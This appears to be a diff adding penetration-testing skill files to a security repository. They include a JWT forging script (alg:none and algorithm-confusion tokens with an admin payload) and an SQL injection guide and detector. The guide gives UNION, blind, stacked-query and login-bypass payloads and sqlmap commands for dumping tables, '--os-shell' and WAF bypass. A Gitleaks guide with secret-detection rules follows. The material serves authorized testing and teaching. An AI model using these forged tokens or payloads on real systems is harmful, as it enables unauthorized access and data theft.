+++ b/security/skills/exploiting-jwt-algorithm-confusion-attack/scripts/agent.py
@@ -1,0 +1,132 @@
+#!/usr/bin/env python3
+"""Agent for testing JWT algorithm confusion vulnerabilities."""
+
+import argparse
+import base64
+import hashlib
+import hmac
+import json
+from datetime import datetime, timezone
+
+
+def decode_jwt(token):
+    """Decode a JWT token without verification."""
+    parts = token.split(".")
+    if len(parts) != 3:
+        return None
+    header = json.loads(base64.urlsafe_b64decode(parts[0] + "=="))
+    payload = json.loads(base64.urlsafe_b64decode(parts[1] + "=="))
+    return {"header": header, "payload": payload, "signature": parts[2]}
+
+
+def forge_none_alg(payload_dict):
+    """Create a JWT with alg:none (CVE in some libraries)."""
+    header = base64.urlsafe_b64encode(
+        json.dumps({"alg": "none", "typ": "JWT"}).encode()
+    ).rstrip(b"=").decode()
+    payload = base64.urlsafe_b64encode(
+        json.dumps(payload_dict).encode()
+    ).rstrip(b"=").decode()
+    return f"{header}.{payload}."
+
+
+def forge_hs256_with_public_key(payload_dict, public_key_pem):
+    """Forge JWT by signing with RSA public key as HMAC secret (alg confusion)."""
+    header = base64.urlsafe_b64encode(
+        json.dumps({"alg": "HS256", "typ": "JWT"}).encode()
+    ).rstrip(b"=").decode()
+    payload = base64.urlsafe_b64encode(
+        json.dumps(payload_dict).encode()
+    ).rstrip(b"=").decode()
+    signing_input = f"{header}.{payload}".encode()
+    key_bytes = public_key_pem.encode() if isinstance(public_key_pem, str) else public_key_pem
+    signature = hmac.new(key_bytes, signing_input, hashlib.sha256).digest()
+    sig_b64 = base64.urlsafe_b64encode(signature).rstrip(b"=").decode()
+    return f"{header}.{payload}.{sig_b64}"
+
+
+def analyze_jwt(token):
+    """Analyze a JWT for common vulnerabilities."""
+    decoded = decode_jwt(token)
+    if not decoded:
+        return {"error": "Invalid JWT format"}
+
+    findings = []
+    header = decoded["header"]
+    payload = decoded["payload"]
+
+    alg = header.get("alg", "")
+    if alg.lower() == "none":
+        findings.append({"issue": "Algorithm set to 'none'", "severity": "CRITICAL"})
+    if header.get("jku"):
+        findings.append({"issue": f"JKU header present: {header['jku']}", "severity": "HIGH"})
+    if header.get("x5u"):
+        findings.append({"issue": f"X5U header present: {header['x5u']}", "severity": "HIGH"})
+    if header.get("kid"):
+        findings.append({"issue": f"KID header: {header['kid']}", "severity": "MEDIUM"})
+
+    exp = payload.get("exp")
+    if exp:
+        from datetime import datetime as dt
+        exp_dt = dt.fromtimestamp(exp, tz=timezone.utc)
+        if exp_dt < dt.now(timezone.utc):
+            findings.append({"issue": f"Token expired: {exp_dt.isoformat()}", "severity": "LOW"})
+    else:
+        findings.append({"issue": "No expiration claim", "severity": "MEDIUM"})
+
+    if payload.get("admin") or payload.get("role") in ("admin", "root"):
+        findings.append({"issue": "Admin role in payload", "severity": "INFO"})
+
+    return {
+        "header": header,
+        "payload": payload,
+        "algorithm": alg,
+        "findings": findings,
+    }
+
+
+def main():
+    parser = argparse.ArgumentParser(
+        description="Test JWT algorithm confusion vulnerabilities (authorized testing only)"
+    )
+    parser.add_argument("--token", help="JWT token to analyze")
+    parser.add_argument("--forge-none", action="store_true", help="Forge alg:none token")
+    parser.add_argument("--forge-hs256", help="Path to RSA public key for alg confusion")
+    parser.add_argument("--payload", help="JSON payload for forged token")
+    parser.add_argument("--output", "-o", help="Output JSON report")
+    args = parser.parse_args()
+
+    print("[*] JWT Algorithm Confusion Testing Agent")
+    print("[!] For authorized security testing only")
+    report = {"timestamp": datetime.now(timezone.utc).isoformat(), "findings": []}
+
+    if args.token:
+        analysis = analyze_jwt(args.token)
+        report["findings"].append({"type": "analysis", **analysis})
+        print(f"[*] Algorithm: {analysis.get('algorithm', 'unknown')}")
+        print(f"[*] Issues: {len(analysis.get('findings', []))}")
+
+    payload_dict = json.loads(args.payload) if args.payload else {"sub": "admin", "admin": True}
+
+    if args.forge_none:
+        forged = forge_none_alg(payload_dict)
+        report["findings"].append({"type": "forge_none", "token": forged})
+        print(f"[*] Forged alg:none token: {forged[:60]}...")
+
+    if args.forge_hs256:
+        with open(args.forge_hs256, "r") as f:
+            pub_key = f.read()
+        forged = forge_hs256_with_public_key(payload_dict, pub_key)
+        report["findings"].append({"type": "forge_hs256_confusion", "token": forged[:60] + "..."})
+        print(f"[*] Forged HS256 confusion token generated")
+
+    if args.output:
+        with open(args.output, "w") as f:
+            json.dump(report, f, indent=2)
+        print(f"[*] Report saved to {args.output}")
+    else:
+        print(json.dumps(report, indent=2))
+
+
+if __name__ == "__main__":
+    main()

--- a/security/skills/exploiting-sql-injection-vulnerabilities/SKILL.md
+++ b/security/skills/exploiting-sql-injection-vulnerabilities/SKILL.md
@@ -1,0 +1,205 @@
+---
+name: exploiting-sql-injection-vulnerabilities
+description: 'Identifies and exploits SQL injection vulnerabilities in web applications
+  during authorized penetration tests using manual techniques and automated tools
+  like sqlmap. The tester detects injection points through error-based, union-based,
+  blind boolean, and time-based blind techniques across all major database engines
+  (MySQL, PostgreSQL, MSSQL, Oracle) to demonstrate data extraction, authentication
+  bypass, and potential remote code execution. Activates for requests involving SQL
+  injection testing, SQLi exploitation, database security assessment, or injection
+  vulnerability verification.
+
+  '
+domain: cybersecurity
+subdomain: penetration-testing
+tags:
+- SQL-injection
+- sqlmap
+- database-security
+- OWASP-A03
+- injection-testing
+version: 1.0.0
+author: mahipal
+license: Apache-2.0
+nist_csf:
+- ID.RA-01
+- ID.RA-06
+- GV.OV-02
+- DE.AE-07
+mitre_attack:
+- T1595
+- T1190
+- T1059
+- T1078
+- T1055
+---
+# Exploiting SQL Injection Vulnerabilities
+
+## When to Use
+
+- Testing web application input parameters for SQL injection vulnerabilities during an authorized penetration test
+- Validating that parameterized queries and input sanitization are properly implemented across all database interactions
+- Demonstrating the business impact of a confirmed SQL injection vulnerability by extracting sensitive data
+- Verifying that WAF rules and input validation controls effectively block SQL injection payloads
+- Testing stored procedures, dynamic SQL, and ORM bypass scenarios in enterprise applications
+
+**Do not use** against databases without written authorization, for extracting or exfiltrating actual customer data beyond what is needed for proof of concept, or against production databases where exploitation could corrupt data integrity.
+
+## Prerequisites
+
+- Written authorization specifying the target application and permissible level of exploitation (detection only vs. full exploitation)
+- Burp Suite Professional configured as an intercepting proxy to capture and modify HTTP requests
+- sqlmap installed with current version for automated detection and exploitation
+- Knowledge of the target database engine (MySQL, PostgreSQL, MSSQL, Oracle) or ability to fingerprint it
+- Test accounts at various privilege levels to test injection in authenticated contexts
+
+## Workflow
+
+### Step 1: Injection Point Discovery
+
+Identify parameters that interact with the database:
+
+- **Map all input vectors**: Catalog every parameter in URLs (GET), request bodies (POST), HTTP headers (Cookie, Referer, User-Agent, X-Forwarded-For), and JSON/XML API payloads
+- **Error-based detection**: Inject a single quote (`'`) into each parameter and observe the response. SQL errors (e.g., "You have an error in your SQL syntax", "unterminated quoted string", "ORA-01756") confirm the parameter reaches the database unsanitized.
+- **Boolean-based detection**: Inject `' AND 1=1--` (true condition) and `' AND 1=2--` (false condition). If the responses differ (different content length, different data returned, different HTTP status), the parameter is injectable.
+- **Time-based detection**: Inject `'; WAITFOR DELAY '0:0:5'--` (MSSQL), `' AND SLEEP(5)--` (MySQL), or `'; SELECT pg_sleep(5)--` (PostgreSQL). A 5-second response delay confirms injection.
+- **Out-of-band detection**: Use payloads that trigger DNS or HTTP requests to a Burp Collaborator domain to confirm injection in scenarios where responses are not directly observable.
+- **Second-order injection**: Test for injection where input is stored and later used in a different SQL query (e.g., username stored at registration, used in a query on the profile page).
+
+### Step 2: Database Fingerprinting
+
+Determine the database engine and version to select appropriate exploitation techniques:
+
+- **Error-based fingerprinting**: Each database produces distinctive error messages. MySQL includes "MySQL", MSSQL mentions "SQL Server", PostgreSQL references "PG", Oracle contains "ORA-".
+- **Function-based fingerprinting**: Inject database-specific functions:
+  - MySQL: `' AND VERSION()--` or `' AND @@version--`
+  - MSSQL: `' AND @@version--` or `' AND DB_NAME()--`
+  - PostgreSQL: `' AND version()--`
+  - Oracle: `' AND banner FROM v$version--`
+- **String concatenation differences**: MySQL uses `CONCAT('a','b')` or `'a' 'b'`, MSSQL uses `'a'+'b'`, PostgreSQL uses `'a'||'b'`, Oracle uses `'a'||'b'`
+- **Comment syntax**: MySQL supports `#` and `-- `, MSSQL uses `-- `, PostgreSQL uses `-- `, Oracle uses `-- `
+
+### Step 3: Manual Exploitation Techniques
+
+Exploit confirmed injection points using technique-appropriate methods:
+
+- **UNION-based extraction**: Determine the number of columns with `ORDER BY` incrementing (`' ORDER BY 1--`, `' ORDER BY 2--`, etc. until an error occurs). Then construct UNION SELECT to extract data:
+  ```
+  ' UNION SELECT NULL,username,password,NULL FROM users--
+  ```
+- **Error-based extraction** (MySQL): Use `EXTRACTVALUE` or `UPDATEXML` to force data into error messages:
+  ```
+  ' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT @@version),0x7e))--
+  ```
+- **Blind boolean extraction**: Extract data one character at a time by testing character values:
+  ```
+  ' AND SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)='a'--
+  ```
+- **Time-based blind extraction**: Same character-by-character approach using time delays:
+  ```
+  ' AND IF(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)='a',SLEEP(5),0)--
+  ```
+- **Stacked queries** (where supported): Execute additional SQL statements:
+  ```
+  '; INSERT INTO users(username,password,role) VALUES('attacker','password','admin')--
+  ```
+
+### Step 4: Automated Exploitation with sqlmap
+
+Use sqlmap for efficient exploitation of confirmed injection points:
+
+- **Basic detection**: `sqlmap -u "https://target.com/page?id=1" --batch --random-agent` to detect injection and identify the database
+- **Extract databases**: `sqlmap -u "https://target.com/page?id=1" --dbs` to list all databases
+- **Extract tables**: `sqlmap -u "https://target.com/page?id=1" -D <database> --tables` to list tables
+- **Extract data**: `sqlmap -u "https://target.com/page?id=1" -D <database> -T users --dump --threads 5` to extract table contents
+- **POST parameters**: `sqlmap -u "https://target.com/login" --data="username=test&password=test" -p username` to test POST parameters
+- **Cookie injection**: `sqlmap -u "https://target.com/page" --cookie="session=abc123; id=1*" --level 2` to test cookie parameters (mark injectable parameter with *)
+- **OS command execution** (if DB user has sufficient privileges): `sqlmap -u "https://target.com/page?id=1" --os-shell` to attempt command execution via xp_cmdshell (MSSQL) or INTO OUTFILE (MySQL)
+- **Tamper scripts**: `sqlmap -u "https://target.com/page?id=1" --tamper=space2comment,between` to bypass WAF filters
+
+### Step 5: Impact Demonstration and Reporting
+
+Document the full impact of the SQL injection vulnerability:
+
+- **Data extraction evidence**: Capture screenshots or sqlmap output showing extracted database names, table schemas, and sample records (redact actual PII in the report)
+- **Authentication bypass**: Demonstrate login bypass with `admin' OR 1=1--` and document the bypassed authentication mechanism
+- **Privilege escalation**: If the database user has DBA privileges, document what additional capabilities are available (file read/write, command execution)
+- **Lateral movement potential**: Document if the database server has network access to other internal systems that could be reached through OS-level access gained via SQLi
+- **Remediation**: Provide specific code-level fixes showing the vulnerable query and the corrected parameterized version
+
+## Key Concepts
+
+| Term | Definition |
+|------|------------|
+| **SQL Injection** | A code injection technique that exploits unvalidated user input in SQL queries to manipulate database operations, extract data, or execute administrative operations |
+| **Union-Based SQLi** | Injection technique that appends a UNION SELECT statement to the original query to extract data from other tables in the same response |
+| **Blind SQL Injection** | Injection where the application does not return query results directly; the attacker infers data through boolean responses or time delays |
+| **Parameterized Query** | A prepared SQL statement where user input is passed as parameters rather than concatenated into the query string, preventing injection |
+| **Second-Order Injection** | SQL injection where the malicious payload is stored by the application and executed in a different context or SQL query at a later time |
+| **Stacked Queries** | Executing multiple SQL statements separated by semicolons in a single request, enabling INSERT, UPDATE, or DELETE operations through injection |
+| **WAF Bypass** | Techniques for evading Web Application Firewall rules that block common SQL injection patterns, using encoding, alternate syntax, or fragmentation |
+
+## Tools & Systems
+
+- **sqlmap**: Automated SQL injection detection and exploitation tool supporting 6 injection techniques across 30+ database management systems
+- **Burp Suite Professional**: HTTP proxy for intercepting, modifying, and replaying requests with SQL injection payloads across all parameter types
+- **Havij**: GUI-based SQL injection tool used for rapid automated exploitation when sqlmap is not available
+- **jSQL Injection**: Java-based SQL injection tool with GUI supporting automatic injection, database extraction, and file read/write
+
+## Common Scenarios
+
+### Scenario: SQL Injection in Healthcare Patient Portal
+
+**Context**: A healthcare organization's patient portal allows patients to view their medical records, appointments, and billing information. The application uses a PHP backend with MySQL database. The tester has a valid patient account.
+
+**Approach**:
+1. Map all parameters in the patient portal; identify that the appointment detail page uses `/appointment?id=4521`
+2. Inject a single quote into the id parameter; receive a MySQL error confirming the parameter is injectable
+3. Use `ORDER BY` to determine the query returns 7 columns
+4. Construct UNION SELECT to extract table names from information_schema, discovering tables: patients, medical_records, billing, admin_users
+5. Extract admin_users table to reveal 5 administrator accounts with MD5-hashed passwords
+6. Demonstrate that patient medical records for all patients are accessible by querying the medical_records table through the injection point
+7. Document that 15,000+ patient records containing PHI (protected health information) are accessible, constituting a HIPAA violation
+
+**Pitfalls**:
+- Running sqlmap with default settings against a production database and causing excessive load or data corruption
+- Extracting and storing actual patient data during the assessment rather than limiting proof to record counts and schema
+- Not testing for second-order injection in stored procedures called by the application
+- Failing to test all parameter types (cookies, headers, JSON body) and only testing URL parameters
+
+## Output Format
+
+```
+## Finding: SQL Injection in Appointment Detail Parameter
+
+**ID**: SQLI-001
+**Severity**: Critical (CVSS 9.8)
+**Affected URL**: GET /appointment?id=4521
+**Parameter**: id (GET parameter)
+**Database**: MySQL 8.0.32
+**Injection Type**: Error-based, UNION-based
+
+**Description**:
+The appointment detail page concatenates the 'id' URL parameter directly into
+a SQL query without parameterization or input validation. This allows an attacker
+to inject arbitrary SQL statements and extract data from any table in the database.
+
+**Proof of Concept**:
+Request: GET /appointment?id=4521' UNION SELECT 1,username,password,4,5,6,7 FROM admin_users-- -
+Response: Returns admin usernames and MD5 password hashes in the page content.
+
+**Data Accessible**:
+- patients table: 15,247 records (name, DOB, SSN, address, phone)
+- medical_records table: 43,891 records (diagnoses, prescriptions, lab results)
+- admin_users table: 5 accounts with MD5-hashed passwords
+- billing table: 28,563 records (insurance details, payment information)
+
+**Remediation**:
+1. Replace string concatenation with parameterized queries:
+   VULNERABLE:  $query = "SELECT * FROM appointments WHERE id = " . $_GET['id'];
+   SECURE:      $stmt = $pdo->prepare("SELECT * FROM appointments WHERE id = ?");
+                $stmt->execute([$_GET['id']]);
+2. Implement input validation to reject non-integer values for the id parameter
+3. Apply least-privilege database permissions (read-only for the web application user)
+4. Deploy a WAF rule to detect and block SQL injection patterns as defense-in-depth
+```

--- a/security/skills/exploiting-sql-injection-vulnerabilities/references/api-reference.md
+++ b/security/skills/exploiting-sql-injection-vulnerabilities/references/api-reference.md
@@ -1,0 +1,60 @@
+# API Reference: SQL Injection Detection Agent
+
+## Dependencies
+
+| Library | Version | Purpose |
+|---------|---------|---------|
+| requests | >=2.28 | HTTP client for injection payload delivery |
+
+## CLI Usage
+
+```bash
+python scripts/agent.py \
+  --url "https://target.example.com/products" \
+  --param id --method GET \
+  --output sqli_report.json
+```
+
+## Functions
+
+### `detect_error_based(url, param, method, headers) -> dict`
+Injects `'` and matches response against SQL error patterns for MySQL, PostgreSQL, MSSQL, Oracle, SQLite.
+
+### `detect_boolean_based(url, param, method, headers) -> dict`
+Compares response lengths for `AND 1=1` (true) vs `AND 1=2` (false) against a baseline.
+
+### `detect_time_based(url, param, method, headers, delay) -> dict`
+Tests `SLEEP()`, `pg_sleep()`, and `WAITFOR DELAY` payloads. Measures response time against target delay.
+
+### `detect_union_columns(url, param, method, headers, max_cols) -> dict`
+Increments `ORDER BY N` until error to determine column count for UNION injection.
+
+### `fingerprint_database(url, param, method, headers) -> dict`
+Tries `@@version` and `version()` via UNION SELECT to identify the database engine.
+
+### `run_assessment(url, param, method) -> dict`
+Runs all detection techniques and compiles findings.
+
+## SQL Error Signatures
+
+| Database | Pattern |
+|----------|---------|
+| MySQL | `SQL syntax.*MySQL`, `Warning.*mysql_` |
+| PostgreSQL | `ERROR:\s+syntax error`, `PSQLException` |
+| MSSQL | `SQL Server.*Driver`, `SQLServerException` |
+| Oracle | `ORA-\d{5}` |
+| SQLite | `SQLite\.Exception` |
+
+## Output Schema
+
+```json
+{
+  "target": "https://target.example.com/products",
+  "parameter": "id",
+  "injectable": true,
+  "error_based": {"injectable": true, "database": "mysql"},
+  "boolean_based": {"injectable": true},
+  "time_based": {"injectable": false},
+  "findings": ["CRITICAL: Error-based SQLi confirmed (DB: mysql)"]
+}
+```

--- a/security/skills/exploiting-sql-injection-vulnerabilities/scripts/agent.py
+++ b/security/skills/exploiting-sql-injection-vulnerabilities/scripts/agent.py
@@ -1,0 +1,196 @@
+#!/usr/bin/env python3
+# For authorized testing in lab/CTF environments only
+"""SQL injection detection agent using requests for manual technique-based testing."""
+
+import argparse
+import json
+import logging
+import sys
+import time
+import re
+from typing import Optional
+
+try:
+    import requests
+except ImportError:
+    sys.exit("requests is required: pip install requests")
+
+logging.basicConfig(level=logging.INFO, format="%(asctime)s [%(levelname)s] %(message)s")
+logger = logging.getLogger(__name__)
+
+SQL_ERRORS = {
+    "mysql": [r"SQL syntax.*MySQL", r"Warning.*mysql_", r"MySQLSyntaxErrorException"],
+    "postgresql": [r"ERROR:\s+syntax error", r"pg_query\(\)", r"PSQLException"],
+    "mssql": [r"SQL Server.*Driver", r"OLE DB.*SQL Server", r"SQLServerException"],
+    "oracle": [r"ORA-\d{5}", r"Oracle.*Driver", r"quoted string not properly terminated"],
+    "sqlite": [r"SQLite/JDBCDriver", r"SQLite\.Exception", r"System\.Data\.SQLite"],
+}
+
+
+def detect_error_based(url: str, param: str, method: str = "GET",
+                        headers: Optional[dict] = None) -> dict:
+    """Inject a single quote to detect SQL errors in the response."""
+    payload = "'"
+    test_url, data = _build_request(url, param, payload, method)
+    resp = _send(test_url, method, data, headers)
+
+    db_type = None
+    error_found = False
+    for db, patterns in SQL_ERRORS.items():
+        for pattern in patterns:
+            if re.search(pattern, resp.text, re.IGNORECASE):
+                db_type = db
+                error_found = True
+                break
+        if error_found:
+            break
+
+    return {
+        "technique": "error_based",
+        "parameter": param,
+        "injectable": error_found,
+        "database": db_type,
+        "status_code": resp.status_code,
+    }
+
+
+def detect_boolean_based(url: str, param: str, method: str = "GET",
+                          headers: Optional[dict] = None) -> dict:
+    """Test boolean-based blind SQLi with true/false conditions."""
+    baseline_resp = _send(*_build_request(url, param, "1", method), headers)
+    true_resp = _send(*_build_request(url, param, "1 AND 1=1--", method), headers)
+    false_resp = _send(*_build_request(url, param, "1 AND 1=2--", method), headers)
+
+    true_match = len(true_resp.content) == len(baseline_resp.content)
+    false_diff = abs(len(false_resp.content) - len(baseline_resp.content)) > 10
+
+    return {
+        "technique": "boolean_based",
+        "parameter": param,
+        "injectable": true_match and false_diff,
+        "baseline_length": len(baseline_resp.content),
+        "true_length": len(true_resp.content),
+        "false_length": len(false_resp.content),
+    }
+
+
+def detect_time_based(url: str, param: str, method: str = "GET",
+                       headers: Optional[dict] = None, delay: int = 5) -> dict:
+    """Test time-based blind SQLi with sleep functions."""
+    payloads = {
+        "mysql": f"1 AND SLEEP({delay})--",
+        "postgresql": f"1; SELECT pg_sleep({delay})--",
+        "mssql": f"1; WAITFOR DELAY '0:0:{delay}'--",
+    }
+    results = {}
+    for db, payload in payloads.items():
+        start = time.time()
+        _send(*_build_request(url, param, payload, method), headers)
+        elapsed = time.time() - start
+        results[db] = {"elapsed": round(elapsed, 2), "delayed": elapsed >= delay - 1}
+
+    injectable = any(r["delayed"] for r in results.values())
+    detected_db = next((db for db, r in results.items() if r["delayed"]), None)
+
+    return {
+        "technique": "time_based",
+        "parameter": param,
+        "injectable": injectable,
+        "database": detected_db,
+        "delay_target": delay,
+        "timing_results": results,
+    }
+
+
+def detect_union_columns(url: str, param: str, method: str = "GET",
+                          headers: Optional[dict] = None, max_cols: int = 20) -> dict:
+    """Determine the number of columns for UNION-based injection."""
+    for n in range(1, max_cols + 1):
+        payload = f"1 ORDER BY {n}--"
+        resp = _send(*_build_request(url, param, payload, method), headers)
+        if resp.status_code >= 400 or "error" in resp.text.lower():
+            return {"technique": "union_column_count", "parameter": param, "columns": n - 1}
+
+    return {"technique": "union_column_count", "parameter": param, "columns": None}
+
+
+def fingerprint_database(url: str, param: str, method: str = "GET",
+                          headers: Optional[dict] = None) -> dict:
+    """Identify the database engine using version functions."""
+    version_payloads = {
+        "mysql": "1 UNION SELECT @@version,NULL--",
+        "postgresql": "1 UNION SELECT version(),NULL--",
+        "mssql": "1 UNION SELECT @@version,NULL--",
+    }
+    for db, payload in version_payloads.items():
+        resp = _send(*_build_request(url, param, payload, method), headers)
+        if resp.status_code == 200 and len(resp.content) > 50:
+            return {"database": db, "response_preview": resp.text[:200]}
+
+    return {"database": "unknown"}
+
+
+def _build_request(url: str, param: str, value: str, method: str):
+    if method.upper() == "GET":
+        separator = "&" if "?" in url else "?"
+        return f"{url}{separator}{param}={requests.utils.quote(value)}", None
+    else:
+        return url, {param: value}
+
+
+def _send(url: str, method: str = "GET", data: Optional[dict] = None,
+           headers: Optional[dict] = None) -> requests.Response:
+    h = headers or {}
+    try:
+        if method.upper() == "POST":
+            return requests.post(url, data=data, headers=h, timeout=15, verify=False)
+        return requests.get(url, headers=h, timeout=15, verify=False)
+    except requests.RequestException:
+        return type("FakeResp", (), {"status_code": 0, "text": "", "content": b""})()
+
+
+def run_assessment(url: str, param: str, method: str = "GET") -> dict:
+    """Run complete SQL injection assessment."""
+    error = detect_error_based(url, param, method)
+    boolean = detect_boolean_based(url, param, method)
+    timing = detect_time_based(url, param, method)
+    columns = detect_union_columns(url, param, method) if error["injectable"] else {}
+
+    injectable = error["injectable"] or boolean["injectable"] or timing["injectable"]
+    findings = []
+    if error["injectable"]:
+        findings.append(f"CRITICAL: Error-based SQLi confirmed (DB: {error['database']})")
+    if boolean["injectable"]:
+        findings.append("CRITICAL: Boolean-based blind SQLi confirmed")
+    if timing["injectable"]:
+        findings.append(f"CRITICAL: Time-based blind SQLi confirmed (DB: {timing['database']})")
+
+    return {
+        "target": url,
+        "parameter": param,
+        "injectable": injectable,
+        "error_based": error,
+        "boolean_based": boolean,
+        "time_based": timing,
+        "union_columns": columns,
+        "findings": findings,
+    }
+
+
+def main():
+    parser = argparse.ArgumentParser(description="SQL Injection Detection Agent")
+    parser.add_argument("--url", required=True, help="Target URL")
+    parser.add_argument("--param", required=True, help="Parameter to test")
+    parser.add_argument("--method", default="GET", choices=["GET", "POST"])
+    parser.add_argument("--output", default="sqli_report.json")
+    args = parser.parse_args()
+
+    report = run_assessment(args.url, args.param, args.method)
+    with open(args.output, "w") as f:
+        json.dump(report, f, indent=2)
+    logger.info("Report saved to %s", args.output)
+    print(json.dumps(report, indent=2))
+
+
+if __name__ == "__main__":
+    main()

--- a/security/skills/implementing-secret-scanning-with-gitleaks/SKILL.md
+++ b/security/skills/implementing-secret-scanning-with-gitleaks/SKILL.md
@@ -1,0 +1,345 @@
+---
+name: implementing-secret-scanning-with-gitleaks
+description: 'This skill covers implementing Gitleaks for detecting and preventing
+  hardcoded secrets in git repositories. It addresses configuring pre-commit hooks,
+  CI/CD pipeline integration, custom rule authoring for organization-specific secrets,
+  baseline management for existing repositories, and remediation workflows for exposed
+  credentials.
+
+  '
+domain: cybersecurity
+subdomain: devsecops
+tags:
+- devsecops
+- cicd
+- secret-scanning
+- gitleaks
+- pre-commit
+- secure-sdlc
+version: 1.0.0
+author: mahipal
+license: Apache-2.0
+nist_csf:
+- PR.PS-01
+- GV.SC-07
+- ID.IM-04
+- PR.PS-04
+mitre_attack:
+- T1195
+- T1554
+- T1059.004
+- T1003
+- T1110
+---
+
+# Implementing Secret Scanning with Gitleaks
+
+## When to Use
+
+- When developers may accidentally commit API keys, passwords, tokens, or private keys to repositories
+- When establishing pre-commit gates that prevent secrets from entering the git history
+- When scanning existing repository history for previously committed secrets that need rotation
+- When compliance requirements mandate secret detection across all source code repositories
+- When migrating from manual secret audits to automated continuous scanning
+
+**Do not use** for detecting secrets in running applications or memory (use runtime secret detection), for managing secrets after detection (use Vault or AWS Secrets Manager), or for scanning container images (use Trivy or Grype).
+
+## Prerequisites
+
+- Gitleaks v8.18+ installed via binary, Go install, or Docker
+- Pre-commit framework installed for local hook integration
+- Git repository with history to scan
+- CI/CD platform access (GitHub Actions, GitLab CI, or equivalent)
+
+## Workflow
+
+### Step 1: Install and Run Initial Repository Scan
+
+Perform a baseline scan of the repository to identify all existing secrets in the git history.
+
+```bash
+# Install Gitleaks
+brew install gitleaks  # macOS
+# or download binary from https://github.com/gitleaks/gitleaks/releases
+
+# Scan entire git history for secrets
+gitleaks detect --source . --report-format json --report-path gitleaks-report.json -v
+
+# Scan only staged changes (for pre-commit)
+gitleaks protect --staged --report-format json --report-path gitleaks-staged.json
+
+# Scan specific commit range
+gitleaks detect --source . --log-opts="HEAD~10..HEAD" --report-format json
+
+# Scan without git history (filesystem only)
+gitleaks detect --source . --no-git --report-format json
+```
+
+### Step 2: Configure Pre-Commit Hook
+
+Set up Gitleaks as a pre-commit hook to prevent secrets from being committed.
+
+```yaml
+# .pre-commit-config.yaml
+repos:
+  - repo: https://github.com/gitleaks/gitleaks
+    rev: v8.21.2
+    hooks:
+      - id: gitleaks
+        name: gitleaks
+        description: Detect hardcoded secrets using Gitleaks
+        entry: gitleaks protect --staged --verbose --redact
+        language: golang
+        pass_filenames: false
+```
+
+```bash
+# Install pre-commit framework
+pip install pre-commit
+
+# Install hooks defined in .pre-commit-config.yaml
+pre-commit install
+
+# Run against all files (not just staged)
+pre-commit run gitleaks --all-files
+
+# Test the hook with a deliberate secret
+echo 'AWS_SECRET_ACCESS_KEY="wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"' >> test.txt
+git add test.txt
+git commit -m "test"  # Should be blocked by gitleaks
+```
+
+### Step 3: Integrate into GitHub Actions
+
+```yaml
+# .github/workflows/secret-scanning.yml
+name: Secret Scanning
+
+on:
+  push:
+    branches: [main, develop]
+  pull_request:
+    branches: [main]
+
+jobs:
+  gitleaks:
+    name: Gitleaks Secret Scan
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+        with:
+          fetch-depth: 0  # Full history for comprehensive scanning
+
+      - name: Run Gitleaks
+        uses: gitleaks/gitleaks-action@v2
+        env:
+          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+          GITLEAKS_LICENSE: ${{ secrets.GITLEAKS_LICENSE }}  # Required for gitleaks-action v2
+
+      # Alternative: Run Gitleaks directly
+      - name: Install Gitleaks
+        run: |
+          wget -q https://github.com/gitleaks/gitleaks/releases/download/v8.21.2/gitleaks_8.21.2_linux_x64.tar.gz
+          tar -xzf gitleaks_8.21.2_linux_x64.tar.gz
+          chmod +x gitleaks
+
+      - name: Scan for secrets
+        run: |
+          if [ "${{ github.event_name }}" == "pull_request" ]; then
+            ./gitleaks detect \
+              --source . \
+              --log-opts="${{ github.event.pull_request.base.sha }}..${{ github.event.pull_request.head.sha }}" \
+              --report-format sarif \
+              --report-path gitleaks.sarif \
+              --exit-code 1
+          else
+            ./gitleaks detect \
+              --source . \
+              --report-format sarif \
+              --report-path gitleaks.sarif \
+              --exit-code 1 \
+              --baseline-path .gitleaks-baseline.json
+          fi
+
+      - name: Upload SARIF
+        if: always()
+        uses: github/codeql-action/upload-sarif@v3
+        with:
+          sarif_file: gitleaks.sarif
+          category: gitleaks
+```
+
+### Step 4: Author Custom Detection Rules
+
+Create organization-specific rules for internal secret patterns.
+
+```toml
+# .gitleaks.toml
+title = "Organization Gitleaks Configuration"
+
+[extend]
+useDefault = true  # Include all default rules
+
+# Custom rule for internal API tokens
+[[rules]]
+id = "internal-api-token"
+description = "Internal API token for service-to-service auth"
+regex = '''(?i)x-internal-token["\s:=]+["\']?([a-zA-Z0-9_\-]{40,})["\']?'''
+entropy = 3.5
+keywords = ["x-internal-token"]
+tags = ["internal", "api"]
+
+[[rules]]
+id = "database-connection-string"
+description = "Database connection string with embedded credentials"
+regex = '''(?i)(postgres|mysql|mongodb|redis)://[^:]+:[^@]+@[^/]+/\w+'''
+keywords = ["postgres://", "mysql://", "mongodb://", "redis://"]
+tags = ["database", "credentials"]
+
+[[rules]]
+id = "jwt-secret"
+description = "JWT signing secret"
+regex = '''(?i)(jwt[_-]?secret|jwt[_-]?key)["\s:=]+["\']?([a-zA-Z0-9/+_\-]{32,})["\']?'''
+entropy = 3.0
+keywords = ["jwt_secret", "jwt-secret", "jwt_key", "jwt-key"]
+
+# Allowlist for test files and known safe patterns
+[allowlist]
+description = "Global allowlist"
+paths = [
+  '''(^|/)test(s)?/''',
+  '''(^|/)spec/''',
+  '''\.test\.(js|ts|py)$''',
+  '''\.spec\.(js|ts|py)$''',
+  '''__mocks__/''',
+  '''fixtures/''',
+  '''(^|/)vendor/''',
+  '''node_modules/'''
+]
+regexes = [
+  '''EXAMPLE''',
+  '''example\.com''',
+  '''test[-_]?(key|secret|token|password)''',
+  '''(?i)placeholder''',
+  '''000000+'''
+]
+```
+
+### Step 5: Manage Baselines for Existing Repositories
+
+Create a baseline of known findings to avoid blocking development while historical secrets are being rotated.
+
+```bash
+# Generate baseline from current state
+gitleaks detect --source . --report-format json --report-path .gitleaks-baseline.json
+
+# Subsequent scans compare against baseline (only new findings trigger failures)
+gitleaks detect --source . --baseline-path .gitleaks-baseline.json --exit-code 1
+
+# Review baseline periodically and remove entries as secrets are rotated
+cat .gitleaks-baseline.json | python3 -m json.tool | head -50
+```
+
+### Step 6: Remediate Exposed Secrets
+
+When a secret is detected, follow the rotation and history cleanup procedure.
+
+```bash
+# 1. Immediately rotate the exposed credential
+#    - Revoke the old API key/token in the service provider
+#    - Generate a new credential
